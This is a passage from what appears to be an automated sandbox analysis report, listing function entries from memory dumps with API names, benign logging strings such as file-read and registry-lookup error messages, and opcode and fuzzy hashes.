                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                    • API String ID: 3168844106-1717220914
                                                                    • Opcode ID: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
                                                                    • Instruction ID: 1a072dc581b9dbf8eb64d4abab22adee32291fa74f6bed5571f0b81899f1d2e3
                                                                    • Opcode Fuzzy Hash: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
                                                                    • Instruction Fuzzy Hash: 27213B32A0AA8696EB609F25F84016967A4FB84B94B144136DEDD87A78DF3CE981C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                    • Instruction ID: cf54222780b762a33e76de9bc6982e97a2dae426adc0b6d67c777dafb1df2f8c
                                                                    • Opcode Fuzzy Hash: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                    • Instruction Fuzzy Hash: 82F05423B0860321FA529B5C74517B933411F41766E4D4B35DF498FAE1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                    • Instruction ID: 8f363f456c83260c016397bb3d71d52dfb5acb13af4ebeaf1402bd5970b380c7
                                                                    • Opcode Fuzzy Hash: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                    • Instruction Fuzzy Hash: EDF05423B0860321FA529B5C74517B933411F41766E4D4B35DF598FAE1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                    • Instruction ID: c02b91c830691ff778c5b41c0076b2f48adf9a577cd51bde301ada31a14565e8
                                                                    • Opcode Fuzzy Hash: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                    • Instruction Fuzzy Hash: EBF05423B0860321FA529B5CB4517B933412F41766E4D4B35DF4C8FAE1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                    • Instruction ID: f2d470a9271afabad50fb9956d81e748cf8d5a951462bb6168e8e564295df8d0
                                                                    • Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                    • Instruction Fuzzy Hash: B0F05427B0860321FA525A5CB4517B933411F41766E494B35DF498F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                    • Instruction ID: e083c1634cb49af59e73e380dc9c2b25155b7469cfff6d1a7b500ed62b3ea5bc
                                                                    • Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                    • Instruction Fuzzy Hash: 25F05427B0860321FA525A5CB4517B933412F41766E494B35DF498F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                    • Instruction ID: 49c4efab56eb894ea1ae414040ebd26a3f15ee45b29cda5375ff4563365ef52c
                                                                    • Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                    • Instruction Fuzzy Hash: E6F05427B0860321FA525A5CB4517B933411F41766E494B35DF598F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                    • Instruction ID: f2698647f15afeb0cc04dfd0cd82fa160b93e1c097b64eb8a3907760cb748507
                                                                    • Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                    • Instruction Fuzzy Hash: 49F05427B0860361FA525A5CB4517B933411F41766E494B35DF498F6E1AF3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                    • Instruction ID: 73d5442e68c5b16ba87529bc79229a791455b65f99a37fa7aed0b71120e3276d
                                                                    • Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                    • Instruction Fuzzy Hash: 4AF05427B0860321FA525A9CB4517B973411F41766E494B35DF498FAE1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                    • Instruction ID: 73d5442e68c5b16ba87529bc79229a791455b65f99a37fa7aed0b71120e3276d
                                                                    • Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                    • Instruction Fuzzy Hash: 4AF05427B0860321FA525A9CB4517B973411F41766E494B35DF498FAE1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                    • Instruction ID: e083c1634cb49af59e73e380dc9c2b25155b7469cfff6d1a7b500ed62b3ea5bc
                                                                    • Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                    • Instruction Fuzzy Hash: 25F05427B0860321FA525A5CB4517B933412F41766E494B35DF498F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                    • Instruction ID: f2d470a9271afabad50fb9956d81e748cf8d5a951462bb6168e8e564295df8d0
                                                                    • Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                    • Instruction Fuzzy Hash: B0F05427B0860321FA525A5CB4517B933411F41766E494B35DF498F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                    • Instruction ID: 49c4efab56eb894ea1ae414040ebd26a3f15ee45b29cda5375ff4563365ef52c
                                                                    • Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                    • Instruction Fuzzy Hash: E6F05427B0860321FA525A5CB4517B933411F41766E494B35DF598F6E1AE3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                    • Instruction ID: f2698647f15afeb0cc04dfd0cd82fa160b93e1c097b64eb8a3907760cb748507
                                                                    • Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                    • Instruction Fuzzy Hash: 49F05427B0860361FA525A5CB4517B933411F41766E494B35DF498F6E1AF3DA987C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: b5112363587d99b95d5a7f1dded878a80b264a2cc813f320591506a8cef08d33
                                                                    • Instruction ID: ac454b16bc1c1e4f5e6701ea4cdc2e7c447c29a061f08adb4b5ae369e0a6971b
                                                                    • Opcode Fuzzy Hash: b5112363587d99b95d5a7f1dded878a80b264a2cc813f320591506a8cef08d33
                                                                    • Instruction Fuzzy Hash: 3AF09662A08F4642E7528F46B8413BD725DAF447B4F48017ADD5D466B0EF2DD9859700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 139b1378e786c4bbf6d8834e6450c444383a5ff76061a4ea2f00fd8a700af190
                                                                    • Instruction ID: 63e70f034a86a62ac9668ebfc3871d533be5c0b4a0e4d0b54ad785b4f81c316f
                                                                    • Opcode Fuzzy Hash: 139b1378e786c4bbf6d8834e6450c444383a5ff76061a4ea2f00fd8a700af190
                                                                    • Instruction Fuzzy Hash: 7CF09662A08F4642E7528F86B8413BD725DAF447B4F48017ADD5D466B0EF2DD9859700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: f66e2a320b883bb9a613bc1679b292a285cefaa8b8d887a1be1bdc0c68d29d64
                                                                    • Instruction ID: e44c0e1d9db5d2fe9235c4d4ae83c3aa04cc405537e6bb3d4c43a594a8477c6e
                                                                    • Opcode Fuzzy Hash: f66e2a320b883bb9a613bc1679b292a285cefaa8b8d887a1be1bdc0c68d29d64
                                                                    • Instruction Fuzzy Hash: 4DF09662A08F4642E7528F46B8413BD725DBF447B4F480279DD9D466B0EF2DD9899700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: b4a7218769dee61c1c103bb07a9ae610b9717e13391145cb5cf82966d04e807d
                                                                    • Instruction ID: 2b1401c0a96c61a27ef3008ba2e6be9b01f8a3f503cb86d894ec22f429ba7a46
                                                                    • Opcode Fuzzy Hash: b4a7218769dee61c1c103bb07a9ae610b9717e13391145cb5cf82966d04e807d
                                                                    • Instruction Fuzzy Hash: EBF09662A08E4642E7528F46B8413BD725DBF447B4F480179DD5D466F0EF2DD9899700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
